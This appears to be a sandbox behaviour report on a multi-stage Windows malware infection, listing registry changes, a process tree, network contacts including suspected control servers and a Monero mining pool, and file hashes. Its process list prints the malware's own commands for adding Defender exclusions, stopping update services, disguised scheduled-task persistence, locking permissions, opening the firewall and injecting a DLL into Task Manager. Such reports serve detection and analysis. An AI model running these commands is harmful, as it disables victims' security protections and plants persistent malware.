| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oneetx.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 620
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2772 -ip 2772
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 880
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 888
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 972
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2772 -ip 2772
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 980
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1456
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1408
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | | tcp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| NL | 45.66.230.149:80 | 45.66.230.149 | tcp |
| US | 13.89.179.9:443 | | tcp |
| US | 8.8.8.8:53 | 149.230.66.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 8.8.8.8:53 | rcn.tuktuk.ug | udp |
| NL | 85.209.3.4:11285 | rcn.tuktuk.ug | tcp |
| NL | 85.209.3.4:11285 | rcn.tuktuk.ug | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| N/A | 194.50.153.68:80 | host-file-host6.com | tcp |
| US | 8.8.8.8:53 | 4.3.209.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| NL | 85.209.3.4:11285 | rcn.tuktuk.ug | tcp |
| US | 8.8.8.8:53 | 68.153.50.194.in-addr.arpa | udp |
| NL | 45.12.253.56:80 | 45.12.253.56 | tcp |
| US | 8.8.8.8:53 | 56.253.12.45.in-addr.arpa | udp |
| GB | 96.16.110.41:443 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d238f108-5235-4880-a175-a916ef0d018b.uuid.duniadekho.bar | udp |
| US | 8.8.8.8:53 | 161.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server6.duniadekho.bar | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.50:443 | server6.duniadekho.bar | tcp |
| IN | 172.253.121.127:19302 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.121.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | luckytradeone.com | udp |
| US | 172.67.181.198:443 | luckytradeone.com | tcp |
| US | 8.8.8.8:53 | 50.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.181.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
